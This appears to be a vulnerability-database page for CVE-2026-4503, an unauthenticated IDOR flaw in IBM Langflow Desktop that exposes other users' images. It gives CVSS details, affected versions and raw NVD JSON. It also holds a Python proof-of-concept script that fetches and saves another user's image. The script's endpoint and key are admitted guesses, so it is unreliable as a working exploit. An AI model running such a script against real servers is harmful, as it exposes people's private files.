Security Vulnerability Report
中文
CVE-2026-4503 CVSS 7.5 HIGH

CVE-2026-4503

Published: 2026-04-30 21:16:34
Last Modified: 2026-05-11 17:06:28

Description

IBM Langflow Desktop 1.0.0 through 1.8.4 Langflow could allow an unauthenticated user to view other users' images due to an indirect object reference through a user-controlled key.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:* - VULNERABLE
IBM Langflow Desktop 1.0.0
IBM Langflow Desktop 1.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target host configuration target_host = "http://vulnerable-langflow-server:port" # The vulnerable endpoint usually involves a user-controlled key (e.g., UUID, filename, or ID) # Based on the description, the attacker controls the key to reference the object directly. vulnerable_endpoint = "/api/v1/files/image" # Example of a user-controlled key that might belong to another user # In a real scenario, an attacker might enumerate or guess these keys. malicious_key = "user_b_sensitive_image_id.png" # Construct the full URL exploit_url = f"{target_host}{vulnerable_endpoint}/{malicious_key}" try: # Send a GET request without authentication (PR:N) response = requests.get(exploit_url, timeout=10) # Check if the request was successful (Status 200 OK) if response.status_code == 200: print("[+] Exploit Successful!") print(f"[+] Retrieved data from: {exploit_url}") print(f"[+] Content-Type: {response.headers.get('Content-Type')}") # Save the stolen content to a file with open("stolen_image.png", "wb") as f: f.write(response.content) print("[+] File saved as 'stolen_image.png'") else: print(f"[-] Exploit Failed. Status Code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4503", "sourceIdentifier": "[email protected]", "published": "2026-04-30T21:16:33.667", "lastModified": "2026-05-11T17:06:27.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Langflow Desktop 1.0.0 through 1.8.4 Langflow could allow an unauthenticated user to view other users' images due to an indirect object reference through a user-controlled key."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndIncluding": "1.8.4", "matchCriteriaId": "83CB6A3F-0146-4A7A-9FDF-7F49CCBBC143"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7271099", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}